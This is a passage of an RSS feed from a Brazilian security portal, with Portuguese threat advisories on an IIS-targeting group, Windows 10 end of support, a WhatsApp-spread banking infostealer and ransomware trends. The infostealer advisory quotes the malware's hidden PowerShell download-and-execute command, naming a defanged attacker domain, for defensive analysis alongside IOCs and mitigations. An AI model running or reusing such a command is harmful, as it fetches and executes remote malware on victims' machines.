<p>The post <a href="https://seginfo.com.br/2025/10/10/threat-advisor-campanha-de-grupo-chines-mira-em-empresas-brasileiras/">Threat Advisor &#8211; Campanha de grupo Chinês mira em empresas brasileiras</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="528" height="216" src="https://seginfo.com.br/wp-content/uploads/2025/10/threat-advisor-seginfo.png" alt="" class="wp-image-73176" style="width:736px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/10/threat-advisor-seginfo.png 528w, https://seginfo.com.br/wp-content/uploads/2025/10/threat-advisor-seginfo-300x123.png 300w, https://seginfo.com.br/wp-content/uploads/2025/10/threat-advisor-seginfo-150x61.png 150w" sizes="(max-width: 528px) 100vw, 528px" /></figure>
</div>


<p class="wp-block-paragraph">Um grupo de cibercrime chinês, nomeado como&nbsp;<strong>UAT-8099</strong>, está ativamente envolvido em campanhas de fraude de SEO (<em>Search Engine Optimization</em>) e no roubo de credenciais, arquivos de configuração e certificados. A principal tática identificada em uso do grupo é o comprometimento de servidores&nbsp;<em>Internet Information Services</em>&nbsp;(IIS) vulneráveis, com o objetivo de&nbsp; instalar o malware&nbsp;<em>BadIIS</em>. As operações foram identificadas em países como Índia, Tailândia, Vietnã, Canadá e Brasil, afetando principalmente universidades, empresas de tecnologia e provedores de telecomunicações.</p>



<p class="wp-block-paragraph">O UAT-8099 emprega uma cadeia de ataque sofisticada, em que primeiramente explora configurações inseguras de upload de arquivos em servidores&nbsp;<em>IIS</em>&nbsp;para enviar um&nbsp;<em>web shell&nbsp;</em>malicioso disfarçado de arquivo legítimo.&nbsp;</p>



<p class="wp-block-paragraph">Após o acesso, o&nbsp;<em>web shell</em>&nbsp;é executado para coletar informações do sistema e da rede. Em sequência, um usuário&nbsp;<em>guest</em>&nbsp;é criado e, posteriormente, suas permissões são elevadas a&nbsp;<em>administrator</em>&nbsp;para assim habilitar o&nbsp;<em>Remote Desktop Protocol.&nbsp;</em>Para persistência, o grupo usa o RDP em combinação das ferramentas&nbsp;<em>SoftEther VPN, EasyTier&nbsp;</em>e<em>&nbsp;Fast Reverse Proxy</em>&nbsp;para garantir acesso permanente e contornar medidas de segurança.&nbsp;</p>



<p class="wp-block-paragraph">Num segundo estágio de persistência, o grupo tem usado uma ferramenta compartilhada para obtenção de permissões a nível de sistema e, em seguida, realiza a instalação do malware&nbsp;<em>BadIIS</em>. O agente malicioso visa também a extração das credenciais da vítima com o&nbsp;<em>Procdump</em>, a obtenção de certificados válidos e arquivos de configuração.</p>



<p class="wp-block-paragraph">Como último estágio do ataque, uma ferramenta de segurança e validação do&nbsp;<em>Windows IIS</em>&nbsp;é instalada pelo ator malicioso para impedir que outros invasores comprometam o servidor e adulterem sua configuração do&nbsp;<em>BadIIS.</em></p>



<p class="wp-block-paragraph">Entre as principais recomendações, estão:</p>



<ul class="wp-block-list">
<li><strong>•</strong> realizar auditorias recorrentes das configurações de <em>upload</em> de arquivos em servidores IIS;</li>



<li><strong>•</strong> manter os servidores atualizados;</li>



<li><strong>•</strong> configuração de regras para detecção de criação de contas de usuário suspeitas, ativação de RDP via linha de comando e a presença dos artefatos e ferramentas mencionados;</li>



<li><strong>•</strong> monitoramento periódico de <em>logs</em> do IIS em busca de uploads de arquivos anômalos e acesso a <em>web shells</em>.</li>
</ul>
<p>The post <a href="https://seginfo.com.br/2025/10/10/threat-advisor-campanha-de-grupo-chines-mira-em-empresas-brasileiras/">Threat Advisor &#8211; Campanha de grupo Chinês mira em empresas brasileiras</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73233</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Threat Advisor – Fim do suporte ao Windows 10</title>
		<link>https://seginfo.com.br/2025/10/09/threat-advisor-fim-do-suporte-ao-windows-10/</link>
		
		
		<pubDate>Thu, 09 Oct 2025 13:22:39 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73225</guid>

					<description><![CDATA[<p>A Microsoft lançou um aviso que o suporte ao Windows 10 terminará em 14 de outubro de 2025. Ou seja, não será oferecido mais suporte técnico, atualizações de recursos nem correções de segurança para o Windows 10. Apesar disso, os computadores que utilizam esta versão continuarão funcionando normalmente, mas estarão mais suscetíveis a malwares e&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/10/09/threat-advisor-fim-do-suporte-ao-windows-10/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/10/09/threat-advisor-fim-do-suporte-ao-windows-10/">Threat Advisor &#8211; Fim do suporte ao Windows 10</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="528" height="216" src="https://seginfo.com.br/wp-content/uploads/2025/10/threat-advisor-seginfo.png" alt="" class="wp-image-73176" style="width:736px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/10/threat-advisor-seginfo.png 528w, https://seginfo.com.br/wp-content/uploads/2025/10/threat-advisor-seginfo-300x123.png 300w, https://seginfo.com.br/wp-content/uploads/2025/10/threat-advisor-seginfo-150x61.png 150w" sizes="(max-width: 528px) 100vw, 528px" /></figure>
</div>


<p class="wp-block-paragraph">A Microsoft lançou um aviso que o suporte ao Windows 10 terminará em 14 de outubro de 2025. Ou seja, não será oferecido mais suporte técnico, atualizações de recursos nem correções de segurança para o Windows 10.</p>



<p class="wp-block-paragraph">Apesar disso, os computadores que utilizam esta versão continuarão funcionando normalmente, mas estarão mais suscetíveis a malwares e a novas vulnerabilidades que surgirão. A Microsoft recomenda que os usuários migrem para o Windows 11, caso o dispositivo não seja compatível, a organização recomenda que o usuário se registre no programa Atualizações de Segurança Estendida do Consumidor (ESU) Windows 10, o qual oferece aos clientes uma opção segura para continuarem utilizando o Windows 10 após 14 de outubro de 2025, enquanto fazem a atualização para o Windows 11. Ou então, a solução mais rápida é adquirir um novo dispositivo que suporte o Windows 11.</p>



<p class="wp-block-paragraph">Além disso, com o fim do suporte ao Windows 10, os aplicativos do Microsoft 365 também não terão mais suporte. Para manter um ambiente com suporte, a Microsoft recomenda que seja feita a atualização para o Windows 11.</p>



<p class="wp-block-paragraph">É comum que atacantes explorem versões desatualizadas do Windows para facilitar ataques a ambientes corporativos. Em um caso recente, em agosto deste ano, a empresa russa Aeroflot foi atacada pelos grupos Silent Crow e Cyber Partisans. Os atacantes afirmaram que a empresa ainda utilizava diversas máquinas com Windows XP, o que, segundo eles, facilitou o ataque. Dessa forma, se faz extremamente necessário manter os sistemas operacionais atualizados para a última versão, evitando que sejam exploradas vulnerabilidades conhecidas no ambiente.</p>
<p>The post <a href="https://seginfo.com.br/2025/10/09/threat-advisor-fim-do-suporte-ao-windows-10/">Threat Advisor &#8211; Fim do suporte ao Windows 10</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73225</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Threat Advisor – Nova campanha de malware sendo distribuído via Whatsapp</title>
		<link>https://seginfo.com.br/2025/10/07/threat-advisor-nova-campanha-de-malware-sendo-distribuido-via-whatsapp/</link>
		
		
		<pubDate>Tue, 07 Oct 2025 11:59:24 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73171</guid>

					<description><![CDATA[<p>Foi identificada uma campanha de malware que está sendo divulgada pelo Whatsapp, semelhante a ocorrida em fevereiro deste ano. Desta vez, o malware está utilizando termos como “comprovante” ou “PED“, para atrair atenção das vítimas, solicitando que o arquivo seja aberto em um computador, e não pelo celular: Em uma análise inicial foi possível identificar&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/10/07/threat-advisor-nova-campanha-de-malware-sendo-distribuido-via-whatsapp/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/10/07/threat-advisor-nova-campanha-de-malware-sendo-distribuido-via-whatsapp/">Threat Advisor &#8211; Nova campanha de malware sendo distribuído via Whatsapp</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="528" height="216" src="https://seginfo.com.br/wp-content/uploads/2025/10/threat-advisor-seginfo.png" alt="" class="wp-image-73176" style="width:758px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/10/threat-advisor-seginfo.png 528w, https://seginfo.com.br/wp-content/uploads/2025/10/threat-advisor-seginfo-300x123.png 300w, https://seginfo.com.br/wp-content/uploads/2025/10/threat-advisor-seginfo-150x61.png 150w" sizes="(max-width: 528px) 100vw, 528px" /></figure>
</div>


<p class="wp-block-paragraph">Foi identificada uma campanha de malware que está sendo divulgada pelo Whatsapp, semelhante a ocorrida em fevereiro deste ano. Desta vez, o malware está utilizando termos como “comprovante” ou “PED“, para atrair atenção das vítimas, solicitando que o arquivo seja aberto em um computador, e não pelo celular:</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="518" src="https://seginfo.com.br/wp-content/uploads/2025/10/image-20251001-202955-1024x518.png" alt="" class="wp-image-73173" style="width:602px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/10/image-20251001-202955-1024x518.png 1024w, https://seginfo.com.br/wp-content/uploads/2025/10/image-20251001-202955-300x152.png 300w, https://seginfo.com.br/wp-content/uploads/2025/10/image-20251001-202955-150x76.png 150w, https://seginfo.com.br/wp-content/uploads/2025/10/image-20251001-202955-768x388.png 768w, https://seginfo.com.br/wp-content/uploads/2025/10/image-20251001-202955-1170x591.png 1170w, https://seginfo.com.br/wp-content/uploads/2025/10/image-20251001-202955-950x480.png 950w, https://seginfo.com.br/wp-content/uploads/2025/10/image-20251001-202955.png 1290w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>

<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="298" height="277" src="https://seginfo.com.br/wp-content/uploads/2025/10/image-20251001-204130.png" alt="" class="wp-image-73174" style="aspect-ratio:1.075816551023862;width:258px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/10/image-20251001-204130.png 298w, https://seginfo.com.br/wp-content/uploads/2025/10/image-20251001-204130-150x139.png 150w" sizes="(max-width: 298px) 100vw, 298px" /></figure>
</div>


<p class="wp-block-paragraph">Em uma análise inicial foi possível identificar comportamento de infostealer no arquivo malicioso, ou seja, foco no roubo de credenciais e informações da máquina infectada. O malware está sendo distribuído em formato Zip (arquivo comprimido), e dentro da pasta compactada, existe um arquivo “.LNK” (extensão de atalhos para Windows), o qual, por fim, executa um script Powershell:</p>



<p class="wp-block-paragraph"><em>&nbsp; &nbsp; &nbsp;powershell.exe -w hid -enc SQBFAFg[texto codificado em base 64]…</em></p>



<p class="wp-block-paragraph">Este script utiliza a ação que codifica o comando de instalação de execução do próximo payload para o malware:</p>



<p class="wp-block-paragraph"><em>&nbsp; &nbsp; &nbsp;IEX (New-Object Net.WebClient).DownloadString(&#8216;<a href="https://servetenopote[.com/%5B…%5D&#038;#8217" rel="nofollow">https://servetenopote[.com/%5B…%5D&#038;#8217</a>;)</em></p>



<p class="wp-block-paragraph">Ao analisar de forma aprofundada este comando, temos o seguinte:</p>



<p class="wp-block-paragraph"><strong>•</strong>&nbsp;(New-Object Net.WebClient).DownloadString: função para buscar o código armazenado remotamente e salvar a string em memória;</p>



<p class="wp-block-paragraph"><strong>•&nbsp;</strong>IEX (Invoke-Expression): executa o script que foi salvo pelo comando anterior</p>



<p class="wp-block-paragraph">Durante esta fase, o arquivo malicioso baixado está sendo executado diretamente em memória, ou seja, não está salvando nenhum novo arquivo no disco da máquina, configurando uma ação&nbsp;<em>fileless.</em></p>



<p class="wp-block-paragraph">Realizamos a análise inicial da campanha e a equipe de Threat Intelligence segue investigando para identificar quais os principais riscos deste malware às vítimas e, possivelmente, à organizações que tiverem seus colaboradores comprometidos.</p>



<p class="wp-block-paragraph"><strong>Recomendações gerais:</strong></p>



<p class="wp-block-paragraph"><strong>•&nbsp;</strong>Atualização e instalação imediata do antimalware em todas as máquinas;</p>



<p class="wp-block-paragraph"><strong>•&nbsp;</strong>Realizar uma campanha de conscientização para colaboradores não baixarem arquivos, principalmente, de contatos não confiáveis do Whatsapp, assim como evitar a instalação de quaisquer arquivos Zip, LNK, PS1, etc;</p>



<p class="wp-block-paragraph"><strong>•&nbsp;</strong>Criar regras de bloqueio para execução de scripts Powershell nas máquinas que não necessitam desta funcionalidade;</p>



<p class="wp-block-paragraph"><strong>•&nbsp;</strong>Bloquear nas ferramentas os seguintes IOCs que estão ativos no momento da campanha: zapgrande[.]com, sorvetenopote[.]com, expansiveuser[.]com, ogoampoodopet[.]com e 109.176.30.141;</p>



<p class="wp-block-paragraph"><strong>•&nbsp;</strong>Uso de MFA em todos os serviços da organização, com foco em contas bancárias e de tecnologias internas;</p>



<p class="wp-block-paragraph"><strong>•&nbsp;</strong>É possível que o malware tenha a capacidade de comprometer o Whatsapp das máquinas infectadas, sendo assim, é necessário manter o dobro de atenção a quaisquer arquivos recebidos via Whatsapp, incluindo de contatos confiáveis.</p>



<h3 class="wp-block-heading" id="h-atualizacao-03-10-2025">Atualização 03/10/2025</h3>



<p class="wp-block-paragraph">O seguimento das análises confirmou que o malware trata-se, de fato, de um infostealer com foco em roubo de contas bancárias e de criptomoedas. Além disso, foi possível evidenciar a funcionalidade de replicação para contatos das vítimas via Whatsapp Web, e em alguns casos, utilizando o aplicativo Whatsapp do celular. O malware possui pelo menos três fases de execução mapeadas, sendo que o DLL é carregado totalmente na memória, sem criar arquivos em disco, sendo assim, <em>fileless</em>:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">ZIP → LNK → Powershell → DLL → EXE → Bat (persistência via pasta Startup)</p>
</blockquote>



<p class="wp-block-paragraph">No momento este malware mostrou grande semelhança com o Coyote (utilizado no início do ano em campanha semelhante), mas estas amostras em específico foram nomeadas como Maverick. A figura abaixo mostra a análise estática de um executável da campanha, no qual o arquivo detecta o uso de browser e nomes de bancos específicos.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="471" src="https://seginfo.com.br/wp-content/uploads/2025/10/image-20251003-171848-1024x471.png" alt="" class="wp-image-73180" srcset="https://seginfo.com.br/wp-content/uploads/2025/10/image-20251003-171848-1024x471.png 1024w, https://seginfo.com.br/wp-content/uploads/2025/10/image-20251003-171848-300x138.png 300w, https://seginfo.com.br/wp-content/uploads/2025/10/image-20251003-171848-150x69.png 150w, https://seginfo.com.br/wp-content/uploads/2025/10/image-20251003-171848-768x353.png 768w, https://seginfo.com.br/wp-content/uploads/2025/10/image-20251003-171848-1170x538.png 1170w, https://seginfo.com.br/wp-content/uploads/2025/10/image-20251003-171848-1044x480.png 1044w, https://seginfo.com.br/wp-content/uploads/2025/10/image-20251003-171848.png 1381w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">A TrendMicro compartilhou alguns dos IOCs associados a esta campanha, incluindo hashes, IPs e domínios utilizados pelos atacantes, podem ser acessados pelo <a href="https://documents.trendmicro.com/assets/txt/WhatsApp%20Self-Propagating%20Malware%20IoCs-hhTEpdC.txt">link</a>. Reforçamos as recomendações:</p>



<ul class="wp-block-list">
<li>• Manter o EDR atualizado, adicionando os IOCs disponibilizados;</li>



<li>• Limitar o uso do Powershell a somente máquinas de usuários que necessitam dessa permissão;</li>



<li>• Desabilitar o download automático de arquivos do Whatsapp;</li>



<li>• Conscientizar os colaboradores sobre essa campanha de malware, orientando que não instalem arquivos ZIP chegados em conversas do Whatsapp;</li>
</ul>



<p class="wp-block-paragraph">EXE: <a href="https://bazaar.abuse.ch/sample/8646a46ef0988ca44edd112fac6988a6f9426c9ac1abdbe76069b71c4f1c4664/">https://bazaar.abuse.ch/sample/8646a46ef0988ca44edd112fac6988a6f9426c9ac1abdbe76069b71c4f1c4664/</a></p>



<p class="wp-block-paragraph">ZIP contendo LNK: <a href="https://app.any.run/tasks/35fad3fe-bf0f-4793-b184-930b0271a389">Analysis ComprovanteSantander-41674331.946233716.zip (MD5: 2C3BBA26C330D5FE779D6622A1C76A43) Malicious activity &#8211; Interactive analysis ANY.RUN</a></p>



<p class="wp-block-paragraph">DLL: <a href="https://app.any.run/tasks/0f48a873-9e5a-467f-97d9-d9100579b5e6">Analysis decoded_payload3.dll (MD5: 3B4E9A3F1C0EABB0B9E75AD4613A0311) Malicious activity &#8211; Interactive analysis ANY.RUN</a></p>



<p class="wp-block-paragraph">BAT: <a href="https://app.any.run/tasks/1022645e-4669-41fc-917c-ca825d2562f4">Analysis HealthApp-17b984.bat (MD5: 2E806C74F054FF6B174B1A7D78DB6E23) No threats detected &#8211; Interactive analysis ANY.RUN</a></p>



<p class="wp-block-paragraph"></p>
<p>The post <a href="https://seginfo.com.br/2025/10/07/threat-advisor-nova-campanha-de-malware-sendo-distribuido-via-whatsapp/">Threat Advisor &#8211; Nova campanha de malware sendo distribuído via Whatsapp</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73171</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Cenário de ameaças cibernéticas: Ransomware mantem-se como a principal ameaça</title>
		<link>https://seginfo.com.br/2025/10/03/cenario-de-ameacas-ciberneticas-ransomware-mantem-se-como-a-principal-ameaca/</link>
		
		
		<pubDate>Fri, 03 Oct 2025 12:53:25 +0000</pubDate>
				<category><![CDATA[Artigos]]></category>
		<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73128</guid>

					<description><![CDATA[<p>O mundo da cibersegurança vive um paradoxo em 2025. Enquanto os pedidos de sinistro em seguros cibernéticos caíram 53% no primeiro semestre — sugerindo que as empresas estão mais preparadas para prevenir ataques —, o impacto financeiro dos incidentes bem-sucedidos aumentou significativamente. O Relatório de Riscos Cibernéticos 2025 (Midyear) revela que, quando os criminosos conseguem&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/10/03/cenario-de-ameacas-ciberneticas-ransomware-mantem-se-como-a-principal-ameaca/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/10/03/cenario-de-ameacas-ciberneticas-ransomware-mantem-se-como-a-principal-ameaca/">Cenário de ameaças cibernéticas: Ransomware mantem-se como a principal ameaça</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="684" src="https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1479017656-1024x684.jpeg" alt="" class="wp-image-73131" style="width:714px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1479017656-1024x684.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1479017656-300x200.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1479017656-150x100.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1479017656-768x513.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1479017656-1536x1025.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1479017656-2048x1367.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1479017656-1170x781.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1479017656-1534x1024.jpeg 1534w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_1479017656-719x480.jpeg 719w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">O mundo da cibersegurança vive um paradoxo em 2025. Enquanto os pedidos de sinistro em seguros cibernéticos caíram 53% no primeiro semestre — sugerindo que as empresas estão mais preparadas para prevenir ataques —, o impacto financeiro dos incidentes bem-sucedidos aumentou significativamente.</p>



<p class="wp-block-paragraph">O <strong>Relatório de Riscos Cibernéticos 2025 (Midyear)</strong> revela que, quando os criminosos conseguem superar as defesas, os danos são <strong>17% maiores</strong> em relação ao ano anterior, com ataques de ransomware ultrapassando, em média, <strong>US$ 1,18 milhão</strong> em prejuízos.</p>



<h2 class="wp-block-heading" id="h-criminosos-mais-sofisticados-e-persistentes">Criminosos mais sofisticados e persistentes</h2>



<p class="wp-block-paragraph">Depois do pico de 2024 — quando incidentes envolvendo terceiros saltaram de 0 para 21% das perdas registradas — esperava-se certa estabilização. No entanto, o que se observa é uma mudança de tática dos atacantes, que estão mais estratégicos e diversificando métodos.</p>



<p class="wp-block-paragraph">Principais achados do relatório:</p>



<ul class="wp-block-list">
<li><strong>•</strong> O ransomware representa <strong>91% das perdas financeiras</strong>, embora corresponda a apenas <strong>9,6% das ocorrências</strong>.</li>



<li><strong>•</strong> A prática da <strong>dupla extorsão</strong> já é padrão: exigir pagamento tanto pela liberação dos dados quanto pela não divulgação pública.</li>



<li><strong>•</strong> O custo médio de sinistros por ransomware subiu de <strong>US$ 705 mil em 2024</strong> para <strong>mais de US$ 1,18 milhão em 2025</strong>.</li>



<li><strong>•</strong> <strong>88% das perdas</strong> foram impulsionadas por ataques de engenharia social, com o phishing por <strong>IA atingindo taxa de sucesso de 54%</strong>, contra apenas 12% das tentativas tradicionais.</li>



<li><strong>•</strong> Hospitais e clínicas chegaram a receber <strong>demandas de até US$ 4 milhões</strong> em extorsão.</li>
</ul>



<h2 class="wp-block-heading" id="h-tres-tendencias-criticas-que-estao-redefinindo-o-risco-cibernetico">Três tendências críticas que estão redefinindo o risco cibernético</h2>



<h3 class="wp-block-heading" id="h-1-ia-potencializando-a-engenharia-social">1. IA potencializando a engenharia social</h3>



<p class="wp-block-paragraph">As mensagens de phishing malfeitas ficaram no passado. Em 2025, <strong>78% das empresas sofreram ao menos uma violação associada a ataques com IA</strong>, segundo dados da CrowdStrike.</p>



<p class="wp-block-paragraph">Criminosos usam inteligência artificial para criar e-mails convincentes, falsificar vozes em ligações fraudulentas e até manipular navegadores, driblando a autenticação multifator. Somente no primeiro semestre, <strong>1,8 bilhão de credenciais foram comprometidas</strong> — um aumento de 800% desde janeiro.</p>



<h3 class="wp-block-heading" id="h-2-evolucao-das-taticas-de-ransomware-com-apoio-da-ia">2. Evolução das táticas de ransomware com apoio da IA</h3>



<p class="wp-block-paragraph">O ransomware não apenas cresceu em volume e impacto, como também se tornou <strong>mais inteligente</strong> com o uso de IA.</p>



<p class="wp-block-paragraph">Casos recentes mostraram que grupos de ransomware passaram a <strong>consultar apólices de seguro cibernético das vítimas</strong> para ajustar os valores exigidos. Em um ataque, os criminosos até explicitaram que pediam menos que o limite da apólice, transformando o seguro em um guia para extorsão.</p>



<p class="wp-block-paragraph">Agora, com IA generativa e análise automatizada de grandes volumes de dados roubados, os criminosos conseguem:</p>



<ul class="wp-block-list">
<li><strong>Priorizar alvos mais lucrativos</strong>, identificando informações financeiras, contratos e dados sensíveis rapidamente.</li>



<li><strong>Customizar mensagens de extorsão</strong> de forma convincente, utilizando linguagem adaptada ao perfil da empresa atacada.</li>



<li><strong>Simular comunicações internas</strong> (e-mails falsos de executivos ou departamentos) para aumentar a pressão psicológica durante a negociação.</li>



<li><strong>Automatizar processos de dupla extorsão</strong>, identificando quais dados, se expostos, causariam maior impacto reputacional.</li>
</ul>



<p class="wp-block-paragraph">Embora 79% dos clientes analisados tenham conseguido evitar o pagamento, as técnicas de pressão estão cada vez mais avançadas, explorando fraquezas humanas e organizacionais com precisão. Isso transforma o ransomware em um dos maiores desafios estratégicos da cibersegurança atual.</p>



<h3 class="wp-block-heading" id="h-3-riscos-de-terceiros-continuam-relevantes">3. Riscos de terceiros continuam relevantes</h3>



<p class="wp-block-paragraph">Mesmo com queda nos números — <strong>19% dos incidentes reportados e 15% das perdas em 2025</strong>, frente a 37% e 21% em 2024 —, a interdependência entre empresas ainda representa alto risco. Como visto nos casos da <strong>CDK Global</strong> e da <strong>Change Healthcare</strong>, vulnerabilidades em um fornecedor podem desencadear efeitos em cadeia que atingem setores inteiros.</p>



<h2 class="wp-block-heading" id="h-os-grupos-mais-ativos-em-2025">Os grupos mais ativos em 2025</h2>



<p class="wp-block-paragraph">O relatório destaca alguns dos principais atores por trás dos ataques:</p>



<ul class="wp-block-list">
<li><strong>Scattered Spider</strong>: grupo sofisticado que já atacou setores de varejo, aviação e seguros.</li>



<li><strong>Interlock</strong>: conhecido por usar informações de apólices de seguro para calibrar suas extorsões.</li>



<li><strong>Chaos</strong>: mais destrutivo, com versões anteriores que corrompiam arquivos de forma irreversível.</li>
</ul>



<h2 class="wp-block-heading" id="h-o-que-as-empresas-podem-fazer">O que as empresas podem fazer</h2>



<p class="wp-block-paragraph">Apesar do cenário desafiador, o estudo também aponta avanços. Houve redução geral nos pedidos de sinistro e queda nos incidentes relacionados a terceiros. Porém, os ataques que passam pelas defesas estão mais caros e devastadores.</p>



<p class="wp-block-paragraph">As principais recomendações incluem:</p>



<ol class="wp-block-list">
<li><strong>Proteger sua apólice de seguro cibernético</strong> como se fosse um ativo crítico.</li>



<li><strong>Evitar pagamentos de extorsão por supressão de dados</strong> e investir em resiliência completa.</li>



<li><strong>Adotar defesas baseadas em inteligência</strong>, capazes de monitorar dados roubados e antecipar potenciais violações.</li>
</ol>


<div class="wp-block-image">
<figure class="aligncenter size-large has-lightbox"><a href="https://clavis.com.br/soc-security-operation-center/" target="_blank" rel=" noreferrer noopener"><img loading="lazy" decoding="async" width="1024" height="284" src="https://seginfo.com.br/wp-content/uploads/2023/05/banner-seginfo-SOC-1024x284.png" alt="" class="wp-image-62390" srcset="https://seginfo.com.br/wp-content/uploads/2023/05/banner-seginfo-SOC-1024x284.png 1024w, https://seginfo.com.br/wp-content/uploads/2023/05/banner-seginfo-SOC-300x83.png 300w, https://seginfo.com.br/wp-content/uploads/2023/05/banner-seginfo-SOC-150x42.png 150w, https://seginfo.com.br/wp-content/uploads/2023/05/banner-seginfo-SOC-768x213.png 768w, https://seginfo.com.br/wp-content/uploads/2023/05/banner-seginfo-SOC.png 1080w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></figure>
</div>


<p class="wp-block-paragraph"></p>
<p>The post <a href="https://seginfo.com.br/2025/10/03/cenario-de-ameacas-ciberneticas-ransomware-mantem-se-como-a-principal-ameaca/">Cenário de ameaças cibernéticas: Ransomware mantem-se como a principal ameaça</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73128</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Ameaças a sistemas SCADA: protegendo infraestruturas críticas</title>
		<link>https://seginfo.com.br/2025/10/02/ameacas-a-sistemas-scada-protegendo-infraestruturas-criticas/</link>
		
		
		<pubDate>Thu, 02 Oct 2025 20:00:00 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73135</guid>

					<description><![CDATA[<p>Os sistemas de supervisão, controle e aquisição de dados (Supervisory Control And Data Acquisition, conhecidos como SCADA) são fundamentais para gerenciar e monitorar operações industriais em setores essenciais como energia, água, tráfego e manufatura. Sua função estratégica os torna a espinha dorsal de infraestruturas críticas em todo o mundo. A integração dos sistemas SCADA com&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/10/02/ameacas-a-sistemas-scada-protegendo-infraestruturas-criticas/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/10/02/ameacas-a-sistemas-scada-protegendo-infraestruturas-criticas/">Ameaças a sistemas SCADA: protegendo infraestruturas críticas</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
